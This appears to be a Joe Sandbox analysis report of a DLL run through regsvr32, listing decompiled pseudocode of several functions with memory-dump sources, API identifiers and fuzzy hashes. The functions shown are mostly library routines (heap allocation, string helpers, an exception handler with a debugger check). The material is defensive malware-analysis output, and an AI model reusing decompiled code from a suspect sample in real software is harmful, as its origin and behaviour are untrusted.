                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
                                                                                                      • Instruction ID: d8a3c5ea84fbd7d79ab6afdc99c80225032a6ead74fcb5c3d0285862c6282d09
                                                                                                      • Opcode Fuzzy Hash: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
                                                                                                      • Instruction Fuzzy Hash: 0FF0F813E2D20789FF645B62DA5237511806F8ABE0F084630EC3E8B3C1DE6CE5C14630
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 44%
                                                                                                      			E00007FF87FF87C101B10(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
                                                                                                      				void* _t7;
                                                                                                      				void* _t8;
                                                                                                      
                                                                                                      				_t8 = __rax;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				E00007FF87FF87C1011A0(_a16);
                                                                                                      				_t7 = E00007FF87FF87C101B40(_t8, _a8, _a16, _t8); // executed
                                                                                                      				return _t7;
                                                                                                      			}





                                                                                                      0x7ff87c101b10
                                                                                                      0x7ff87c101b10
                                                                                                      0x7ff87c101b15
                                                                                                      0x7ff87c101b23
                                                                                                      0x7ff87c101b35
                                                                                                      0x7ff87c101b3e

                                                                                                      APIs
                                                                                                      • char_traits.LIBCPMTD ref: 00007FF87C101B23
                                                                                                        • Part of subcall function 00007FF87C101B40: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C101B6E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Base::Concurrency::details::ContextIdentityQueueWorkchar_traits
                                                                                                      • String ID:
                                                                                                      • API String ID: 1444011685-0
                                                                                                      • Opcode ID: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
                                                                                                      • Instruction ID: 4935dbd788b276db2f5fe8ed1a392a7bc781db769ad7bdf0ca6a3b91ee0e9afe
                                                                                                      • Opcode Fuzzy Hash: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
                                                                                                      • Instruction Fuzzy Hash: DED09E67939A8181D644FB12F89115AA760FBC97C0F905435FA9E43B2AEF2CC1D14B00
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 65%
                                                                                                      			E00007FF87FF87C109474(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
                                                                                                      				void* __rdi;
                                                                                                      				void* _t36;
                                                                                                      				int _t40;
                                                                                                      				void* _t45;
                                                                                                      				intOrPtr _t53;
                                                                                                      				signed long long _t63;
                                                                                                      				long long _t66;
                                                                                                      				_Unknown_base(*)()* _t86;
                                                                                                      				void* _t90;
                                                                                                      				void* _t91;
                                                                                                      				void* _t93;
                                                                                                      				signed long long _t94;
                                                                                                      				struct _EXCEPTION_POINTERS* _t100;
                                                                                                      
                                                                                                      				_t46 = __ecx;
                                                                                                      				 *((long long*)(_t93 + 0x10)) = __rbx;
                                                                                                      				 *((long long*)(_t93 + 0x18)) = __rsi;
                                                                                                      				_t91 = _t93 - 0x4f0;
                                                                                                      				_t94 = _t93 - 0x5f0;
                                                                                                      				_t63 =  *0x7c17e008; // 0xefd957cda2cd
                                                                                                      				 *(_t91 + 0x4e0) = _t63 ^ _t94;
                                                                                                      				_t53 = r8d;
                                                                                                      				_t45 = __ecx;
                                                                                                      				if (__ecx == 0xffffffff) goto 0x7c1094b3;
                                                                                                      				E00007FF87FF87C10493C(_t36);
                                                                                                      				r8d = 0x98;
                                                                                                      				E00007FF87FF87C106920(__ecx, 0, _t53, __esp, _t94 + 0x70, __rdx, _t86, __r8);
                                                                                                      				r8d = 0x4d0;
                                                                                                      				E00007FF87FF87C106920(_t46, 0, _t53, __esp, _t91 + 0x10, __rdx, _t86, __r8);
                                                                                                      				 *((long long*)(_t94 + 0x48)) = _t94 + 0x70;
                                                                                                      				_t66 = _t91 + 0x10;
                                                                                                      				 *((long long*)(_t94 + 0x50)) = _t66;
                                                                                                      				__imp__RtlCaptureContext();
                                                                                                      				r8d = 0;
                                                                                                      				__imp__RtlLookupFunctionEntry();
                                                                                                      				if (_t66 == 0) goto 0x7c109546;
                                                                                                      				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
                                                                                                      				 *((long long*)(_t94 + 0x30)) = _t94 + 0x58;
                                                                                                      				 *((long long*)(_t94 + 0x28)) = _t94 + 0x60;
                                                                                                      				 *((long long*)(_t94 + 0x20)) = _t91 + 0x10;
                                                                                                      				__imp__RtlVirtualUnwind();
                                                                                                      				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
                                                                                                      				 *((intOrPtr*)(_t94 + 0x70)) = __edx;
                                                                                                      				 *((long long*)(_t91 + 0xa8)) = _t91 + 0x510;
                                                                                                      				 *((long long*)(_t91 - 0x80)) =  *((intOrPtr*)(_t91 + 0x508));
                                                                                                      				 *((intOrPtr*)(_t94 + 0x74)) = _t53;
                                                                                                      				_t40 = IsDebuggerPresent();
                                                                                                      				SetUnhandledExceptionFilter(_t86, _t90);
                                                                                                      				if (UnhandledExceptionFilter(_t100) != 0) goto 0x7c1095a8;
                                                                                                      				if (_t40 != 0) goto 0x7c1095a8;
                                                                                                      				if (_t45 == 0xffffffff) goto 0x7c1095a8;
                                                                                                      				return E00007FF87FF87C103A70(E00007FF87FF87C10493C(_t42), _t45, 0,  *(_t91 + 0x4e0) ^ _t94);
                                                                                                      			}
















                                                                                                      0x7ff87c109474
                                                                                                      0x7ff87c109474
                                                                                                      0x7ff87c109479
                                                                                                      0x7ff87c109482
                                                                                                      0x7ff87c10948a
                                                                                                      0x7ff87c109491
                                                                                                      0x7ff87c10949b
                                                                                                      0x7ff87c1094a2
                                                                                                      0x7ff87c1094a7
                                                                                                      0x7ff87c1094ac
                                                                                                      0x7ff87c1094ae
                                                                                                      0x7ff87c1094ba
                                                                                                      0x7ff87c1094c0
                                                                                                      0x7ff87c1094cb
                                                                                                      0x7ff87c1094d1
                                                                                                      0x7ff87c1094db
                                                                                                      0x7ff87c1094e4
                                                                                                      0x7ff87c1094e8
                                                                                                      0x7ff87c1094ed
                                                                                                      0x7ff87c109502
                                                                                                      0x7ff87c109505
                                                                                                      0x7ff87c10950e
                                                                                                      0x7ff87c109510
                                                                                                      0x7ff87c109523
                                                                                                      0x7ff87c109530
                                                                                                      0x7ff87c109539
                                                                                                      0x7ff87c109540
                                                                                                      0x7ff87c10954d
                                                                                                      0x7ff87c10955f
                                                                                                      0x7ff87c109563
                                                                                                      0x7ff87c109571
                                                                                                      0x7ff87c109575
                                                                                                      0x7ff87c109579
                                                                                                      0x7ff87c109583
                                                                                                      0x7ff87c109596
                                                                                                      0x7ff87c10959a
                                                                                                      0x7ff87c10959f
                                                                                                      0x7ff87c1095ce

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1239891234-0
                                                                                                      • Opcode ID: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
                                                                                                      • Instruction ID: e1f21ebf9096729ff0fc362a45f6d759f9d36cd637a806aa56c9c563d74c80cf
                                                                                                      • Opcode Fuzzy Hash: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
                                                                                                      • Instruction Fuzzy Hash: A8314137628F8186E760CF25E8503AE73A4FB8A798F544136EA9D43B94DF3CD5858B10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 49%
                                                                                                      			E00007FF87FF87C103240(void* __edx, void* __eflags, long long __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, intOrPtr _a40, long long _a48) {
                                                                                                      				long long _v16;
                                                                                                      				long long _v24;
                                                                                                      				long long _v32;
                                                                                                      				long long _v40;
                                                                                                      				long long _v48;
                                                                                                      				long long _v56;
                                                                                                      				long long _v64;
                                                                                                      				long long _v72;
                                                                                                      				long long _v80;
                                                                                                      				long long _v88;
                                                                                                      				long long _v96;
                                                                                                      				long long _v104;
                                                                                                      				long long _v112;
                                                                                                      				long long _v120;
                                                                                                      				long long _v128;
                                                                                                      				long long _v136;
                                                                                                      				long long _t207;
                                                                                                      				intOrPtr* _t209;
                                                                                                      				intOrPtr _t218;
                                                                                                      				intOrPtr _t221;
                                                                                                      				long long _t223;
                                                                                                      				void* _t225;
                                                                                                      				intOrPtr _t228;
                                                                                                      				long long _t229;
                                                                                                      				void* _t230;
                                                                                                      				intOrPtr _t235;
                                                                                                      				long long _t237;
                                                                                                      				void* _t239;
                                                                                                      				void* _t243;
                                                                                                      				long long _t245;
                                                                                                      				void* _t247;
                                                                                                      				long long _t248;
                                                                                                      				void* _t249;
                                                                                                      				long long _t250;
                                                                                                      				void* _t251;
                                                                                                      				long long _t257;
                                                                                                      
                                                                                                      				_t207 = __rax;
                                                                                                      				_a32 = __r9;
                                                                                                      				_a24 = __r8;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				E00007FF87FF87C1021F0(__eflags, __rax, _a8, _a16);
                                                                                                      				E00007FF87FF87C1021F0(__eflags, __rax, _a32, _a40);
                                                                                                      				E00007FF87FF87C102400(__eflags, __rax, _a8, _a16, _a24);
                                                                                                      				_a24 = _t207;
                                                                                                      				E00007FF87FF87C102400(__eflags, _t207, _a32, _a40, _a48);
                                                                                                      				_a48 = _t207;
                                                                                                      				_t209 = 0xffffffff - _a48;
                                                                                                      				_v120 = 0xffffffff;
                                                                                                      				E00007FF87FF87C102170(_t209, _a8);
                                                                                                      				_t211 =  *_t209 - _a24;
                                                                                                      				if (_v120 - 0xffffffff > 0) goto 0x7c103315;
                                                                                                      				E00007FF87FF87C102230(_a8);
                                                                                                      				E00007FF87FF87C102170( *_t209 - _a24, _a8);
                                                                                                      				_v136 = 0xffffffff;
                                                                                                      				E00007FF87FF87C102170( *_t211 - _a24 - _a16, _a8);
                                                                                                      				_v128 = 0xffffffff;
                                                                                                      				E00007FF87FF87C102170( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8);
                                                                                                      				if ( *0xffffffff - _v128 >= 0) goto 0x7c10338e;
                                                                                                      				r8d = 0;
                                                                                                      				E00007FF87FF87C1022B0( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8, _v128);
                                                                                                      				_t218 = _a24;
                                                                                                      				if (_a48 != _t218) goto 0x7c1033ec;
                                                                                                      				E00007FF87FF87C1018D0(_t218, _a32);
                                                                                                      				_v112 = _t218 + _a40;
                                                                                                      				E00007FF87FF87C1018F0(_t218 + _a40, _a8);
                                                                                                      				E00007FF87FF87C101230(_t218 + _a40 + _a16, _v112, _a48);
                                                                                                      				goto 0x7c103810;
                                                                                                      				_t221 = _a32;
                                                                                                      				if (_a8 == _t221) goto 0x7c1034a2;
                                                                                                      				E00007FF87FF87C1018F0(_t221, _a8);
                                                                                                      				_t223 = _t221 + _a16 + _a24;
                                                                                                      				_v104 = _t223;
                                                                                                      				E00007FF87FF87C1018F0(_t223, _a8);
                                                                                                      				_t225 = _t223 + _a16 + _a48;
                                                                                                      				E00007FF87FF87C101230(_t225, _v104, _v136);
                                                                                                      				E00007FF87FF87C1018D0(_t225, _a32);
                                                                                                      				_v96 = _t225 + _a40;
                                                                                                      				E00007FF87FF87C1018F0(_t225 + _a40, _a8);
                                                                                                      				E00007FF87FF87C1011E0(_t225 + _a40 + _a16, _v96, _a48);
                                                                                                      				goto 0x7c103810;
                                                                                                      				_t228 = _a24;
                                                                                                      				if (_a48 - _t228 >= 0) goto 0x7c103558;
                                                                                                      				E00007FF87FF87C1018F0(_t228, _a8);
                                                                                                      				_t229 = _t228 + _a40;
                                                                                                      				_v88 = _t229;
                                                                                                      				E00007FF87FF87C1018F0(_t229, _a8);
                                                                                                      				_t230 = _t229 + _a16;
                                                                                                      				E00007FF87FF87C101230(_t230, _v88, _a48);
                                                                                                      				E00007FF87FF87C1018F0(_t230, _a8);
                                                                                                      				_v80 = _t230 + _a16 + _a24;
                                                                                                      				E00007FF87FF87C1018F0(_t230 + _a16 + _a24, _a8);
                                                                                                      				E00007FF87FF87C101230(_t230 + _a16 + _a24 + _a16 + _a48, _v80, _v136);
                                                                                                      				goto 0x7c103810;
                                                                                                      				_t235 = _a16;
                                                                                                      				if (_a40 - _t235 > 0) goto 0x7c10360e;
                                                                                                      				E00007FF87FF87C1018F0(_t235, _a8);
                                                                                                      				_t237 = _t235 + _a16 + _a24;
                                                                                                      				_v72 = _t237;
                                                                                                      				E00007FF87FF87C1018F0(_t237, _a8);
                                                                                                      				_t239 = _t237 + _a16 + _a48;
                                                                                                      				E00007FF87FF87C101230(_t239, _v72, _v136);
                                                                                                      				E00007FF87FF87C1018F0(_t239, _a8);
                                                                                                      				_v64 = _t239 + _a40;
                                                                                                      				E00007FF87FF87C1018F0(_t239 + _a40, _a8);
                                                                                                      				E00007FF87FF87C101230(_t239 + _a40 + _a16, _v64, _a48);
                                                                                                      				goto 0x7c103810;
                                                                                                      				_t243 = _a16 + _a24;
                                                                                                      				if (_t243 - _a40 > 0) goto 0x7c1036eb;
                                                                                                      				E00007FF87FF87C1018F0(_t243, _a8);
                                                                                                      				_t245 = _t243 + _a16 + _a24;
                                                                                                      				_v56 = _t245;
                                                                                                      				E00007FF87FF87C1018F0(_t245, _a8);
                                                                                                      				_t247 = _t245 + _a16 + _a48;
                                                                                                      				E00007FF87FF87C101230(_t247, _v56, _v136);
                                                                                                      				E00007FF87FF87C1018F0(_t247, _a8);
                                                                                                      				_t248 = _t247 + _a40 + _a48 - _a24;
                                                                                                      				_v48 = _t248;
                                                                                                      				E00007FF87FF87C1018F0(_t248, _a8);
                                                                                                      				_t249 = _t248 + _a16;
                                                                                                      				E00007FF87FF87C101230(_t249, _v48, _a48);
                                                                                                      				goto 0x7c103810;
                                                                                                      				E00007FF87FF87C1018F0(_t249, _a8);
                                                                                                      				_t250 = _t249 + _a40;
                                                                                                      				_v40 = _t250;
                                                                                                      				E00007FF87FF87C1018F0(_t250, _a8);
                                                                                                      				_t251 = _t250 + _a16;
                                                                                                      				E00007FF87FF87C101230(_t251, _v40, _a24);
                                                                                                      				E00007FF87FF87C1018F0(_t251, _a8);
                                                                                                      				_v32 = _t251 + _a16 + _a24;
                                                                                                      				E00007FF87FF87C1018F0(_t251 + _a16 + _a24, _a8);
                                                                                                      				E00007FF87FF87C101230(_t251 + _a16 + _a24 + _a16 + _a48, _v32, _v136);
                                                                                                      				_t257 = _a48 - _a24;
                                                                                                      				_v24 = _t257;
                                                                                                      				E00007FF87FF87C1018F0(_t257, _a8);
                                                                                                      				_t259 = _t257 + _a40 + _a48;
                                                                                                      				_v16 = _t257 + _a40 + _a48;
                                                                                                      				E00007FF87FF87C1018F0(_t257 + _a40 + _a48, _a8);
                                                                                                      				E00007FF87FF87C101230(_t259 + _a16 + _a24, _v16, _v24);
                                                                                                      				return E00007FF87FF87C1023A0(_t259 + _a16 + _a24, _a8, _v128);
                                                                                                      			}







































                                                                                                      0x7ff87c103240
                                                                                                      0x7ff87c103240
                                                                                                      0x7ff87c103245
                                                                                                      0x7ff87c10324a
                                                                                                      0x7ff87c10324f
                                                                                                      0x7ff87c10326b
                                                                                                      0x7ff87c103280
                                                                                                      0x7ff87c10329d
                                                                                                      0x7ff87c1032a2
                                                                                                      0x7ff87c1032c2
                                                                                                      0x7ff87c1032c7
                                                                                                      0x7ff87c1032d6
                                                                                                      0x7ff87c1032de
                                                                                                      0x7ff87c1032eb
                                                                                                      0x7ff87c1032fb
                                                                                                      0x7ff87c103306
                                                                                                      0x7ff87c103310
                                                                                                      0x7ff87c10331d
                                                                                                      0x7ff87c103338
                                                                                                      0x7ff87c103345
                                                                                                      0x7ff87c10335d
                                                                                                      0x7ff87c10336a
                                                                                                      0x7ff87c103377
                                                                                                      0x7ff87c103379
                                                                                                      0x7ff87c103389
                                                                                                      0x7ff87c10338e
                                                                                                      0x7ff87c10339e
                                                                                                      0x7ff87c1033a8
                                                                                                      0x7ff87c1033b5
                                                                                                      0x7ff87c1033c2
                                                                                                      0x7ff87c1033e2
                                                                                                      0x7ff87c1033e7
                                                                                                      0x7ff87c1033ec
                                                                                                      0x7ff87c1033fc
                                                                                                      0x7ff87c10340a
                                                                                                      0x7ff87c103417
                                                                                                      0x7ff87c10341f
                                                                                                      0x7ff87c10342c
                                                                                                      0x7ff87c103439
                                                                                                      0x7ff87c103451
                                                                                                      0x7ff87c10345e
                                                                                                      0x7ff87c10346b
                                                                                                      0x7ff87c103478
                                                                                                      0x7ff87c103498
                                                                                                      0x7ff87c10349d
                                                                                                      0x7ff87c1034a2
                                                                                                      0x7ff87c1034b2
                                                                                                      0x7ff87c1034c0
                                                                                                      0x7ff87c1034c5
                                                                                                      0x7ff87c1034cd
                                                                                                      0x7ff87c1034da
                                                                                                      0x7ff87c1034df
                                                                                                      0x7ff87c1034fa
                                                                                                      0x7ff87c103507
                                                                                                      0x7ff87c10351c
                                                                                                      0x7ff87c103529
                                                                                                      0x7ff87c10354e
                                                                                                      0x7ff87c103553
                                                                                                      0x7ff87c103558
                                                                                                      0x7ff87c103568
                                                                                                      0x7ff87c103576
                                                                                                      0x7ff87c103583
                                                                                                      0x7ff87c10358b
                                                                                                      0x7ff87c103598
                                                                                                      0x7ff87c1035a5
                                                                                                      0x7ff87c1035bd
                                                                                                      0x7ff87c1035ca
                                                                                                      0x7ff87c1035d7
                                                                                                      0x7ff87c1035e4
                                                                                                      0x7ff87c103604
                                                                                                      0x7ff87c103609
                                                                                                      0x7ff87c103621
                                                                                                      0x7ff87c10362c
                                                                                                      0x7ff87c10363a
                                                                                                      0x7ff87c103647
                                                                                                      0x7ff87c10364f
                                                                                                      0x7ff87c10365c
                                                                                                      0x7ff87c103669
                                                                                                      0x7ff87c103681
                                                                                                      0x7ff87c10368e
                                                                                                      0x7ff87c1036b1
                                                                                                      0x7ff87c1036b4
                                                                                                      0x7ff87c1036c1
                                                                                                      0x7ff87c1036c6
                                                                                                      0x7ff87c1036e1
                                                                                                      0x7ff87c1036e6
                                                                                                      0x7ff87c1036f3
                                                                                                      0x7ff87c1036f8
                                                                                                      0x7ff87c103700
                                                                                                      0x7ff87c103710
                                                                                                      0x7ff87c103715
                                                                                                      0x7ff87c103733
                                                                                                      0x7ff87c103740
                                                                                                      0x7ff87c103755
                                                                                                      0x7ff87c103765
                                                                                                      0x7ff87c10378d
                                                                                                      0x7ff87c1037a5
                                                                                                      0x7ff87c1037a8
                                                                                                      0x7ff87c1037b8
                                                                                                      0x7ff87c1037c5
                                                                                                      0x7ff87c1037cd
                                                                                                      0x7ff87c1037dd
                                                                                                      0x7ff87c10380b
                                                                                                      0x7ff87c103831

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$EmptyQueue::Structured$Mtx_guardMtx_guard::~_
                                                                                                      • String ID:
                                                                                                      • API String ID: 1550686663-0
                                                                                                      • Opcode ID: 6fddd8db350bc00e0fa7d7ec8e822f1350b5388c6aacc03662ae6e3237efefb8
                                                                                                      • Instruction ID: a3a045be634817e72fce190ad7022028dbe7875793d1447939b4a35709884d09
                                                                                                      • Opcode Fuzzy Hash: 6fddd8db350bc00e0fa7d7ec8e822f1350b5388c6aacc03662ae6e3237efefb8
                                                                                                      • Instruction Fuzzy Hash: ADD1A467A2DBC181DA70DB52F4913AAB361FBC97C4F104136EA9D43B6ADF2CD0948B11
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CreateMessageRegisterTouch
                                                                                                      • String ID: Cannot register application window for multi-touch input$Error
                                                                                                      • API String ID: 490141109-480840240
                                                                                                      • Opcode ID: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
                                                                                                      • Instruction ID: 973a630e2093a47b28c8d2de34e75b6783658ef425706529ece25061529dcb26
                                                                                                      • Opcode Fuzzy Hash: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
                                                                                                      • Instruction Fuzzy Hash: C851F83692CB4686E750CF15E88436A73A0FB86BE4F504536DA8E477A8DF3CE085C760
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 48%
                                                                                                      			E00007FF87FF87C102FC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, long long _a40) {
                                                                                                      				long long _v24;
                                                                                                      				long long _v32;
                                                                                                      				long long _v40;
                                                                                                      				long long _v48;
                                                                                                      				long long _v56;
                                                                                                      				long long _v64;
                                                                                                      				long long _v72;
                                                                                                      				long long _t100;
                                                                                                      				intOrPtr* _t102;
                                                                                                      				intOrPtr* _t104;
                                                                                                      				long long _t108;
                                                                                                      				long long _t110;
                                                                                                      				intOrPtr* _t112;
                                                                                                      				intOrPtr _t116;
                                                                                                      				long long _t118;
                                                                                                      
                                                                                                      				_a32 = __r9;
                                                                                                      				_a24 = __r8;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				if ((E00007FF87FF87C102250(__rax, _a8, _a32) & 0x000000ff) == 0) goto 0x7c10303c;
                                                                                                      				E00007FF87FF87C1018F0(__rax, _a8);
                                                                                                      				_t100 = _a32 - __rax;
                                                                                                      				_v64 = _a40;
                                                                                                      				_v72 = _t100;
                                                                                                      				E00007FF87FF87C103240(__edx, E00007FF87FF87C102250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24, _a8);
                                                                                                      				goto 0x7c103214;
                                                                                                      				E00007FF87FF87C1021F0(E00007FF87FF87C102250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16);
                                                                                                      				E00007FF87FF87C102400(E00007FF87FF87C102250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24);
                                                                                                      				_a24 = _t100;
                                                                                                      				_t102 = 0xffffffff - _a40;
                                                                                                      				_v40 = 0xffffffff;
                                                                                                      				E00007FF87FF87C102170(_t102, _a8);
                                                                                                      				_t104 =  *_t102 - _a24;
                                                                                                      				if (_v40 - 0xffffffff > 0) goto 0x7c1030aa;
                                                                                                      				E00007FF87FF87C102230(_a8);
                                                                                                      				E00007FF87FF87C102170(_t104, _a8);
                                                                                                      				_v56 =  *_t104 - _a24 - _a16;
                                                                                                      				_t108 = _a24;
                                                                                                      				if (_a40 - _t108 >= 0) goto 0x7c103126;
                                                                                                      				E00007FF87FF87C1018F0(_t108, _a8);
                                                                                                      				_t110 = _t108 + _a16 + _a24;
                                                                                                      				_v32 = _t110;
                                                                                                      				E00007FF87FF87C1018F0(_t110, _a8);
                                                                                                      				_t112 = _t110 + _a16 + _a40;
                                                                                                      				E00007FF87FF87C101230(_t112, _v32, _v56);
                                                                                                      				E00007FF87FF87C102170(_t112, _a8);
                                                                                                      				_v48 =  *_t112 + _a40 - _a24;
                                                                                                      				if (_a40 > 0) goto 0x7c103162;
                                                                                                      				if (_a24 <= 0) goto 0x7c10320f;
                                                                                                      				r8d = 0;
                                                                                                      				if ((E00007FF87FF87C1022B0( *_t112 + _a40 - _a24, _a8, _v48) & 0x000000ff) == 0) goto 0x7c10320f;
                                                                                                      				_t116 = _a40;
                                                                                                      				if (_a24 - _t116 >= 0) goto 0x7c1031d9;
                                                                                                      				E00007FF87FF87C1018F0(_t116, _a8);
                                                                                                      				_t118 = _t116 + _a16 + _a24;
                                                                                                      				_v24 = _t118;
                                                                                                      				E00007FF87FF87C1018F0(_t118, _a8);
                                                                                                      				_t120 = _t118 + _a16 + _a40;
                                                                                                      				E00007FF87FF87C101230(_t118 + _a16 + _a40, _v24, _v56);
                                                                                                      				E00007FF87FF87C1018F0(_t118 + _a16 + _a40, _a8);
                                                                                                      				E00007FF87FF87C1011E0(_t120 + _a16, _a32, _a40);
                                                                                                      				return E00007FF87FF87C1023A0(_t120 + _a16, _a8, _v48);
                                                                                                      			}


















                                                                                                      0x7ff87c102fc0
                                                                                                      0x7ff87c102fc5
                                                                                                      0x7ff87c102fca
                                                                                                      0x7ff87c102fcf
                                                                                                      0x7ff87c102fef
                                                                                                      0x7ff87c102ff6
                                                                                                      0x7ff87c103006
                                                                                                      0x7ff87c103011
                                                                                                      0x7ff87c103016
                                                                                                      0x7ff87c103032
                                                                                                      0x7ff87c103037
                                                                                                      0x7ff87c103046
                                                                                                      0x7ff87c10305d
                                                                                                      0x7ff87c103062
                                                                                                      0x7ff87c103071
                                                                                                      0x7ff87c103079
                                                                                                      0x7ff87c103083
                                                                                                      0x7ff87c103093
                                                                                                      0x7ff87c10309e
                                                                                                      0x7ff87c1030a5
                                                                                                      0x7ff87c1030af
                                                                                                      0x7ff87c1030c7
                                                                                                      0x7ff87c1030cc
                                                                                                      0x7ff87c1030dc
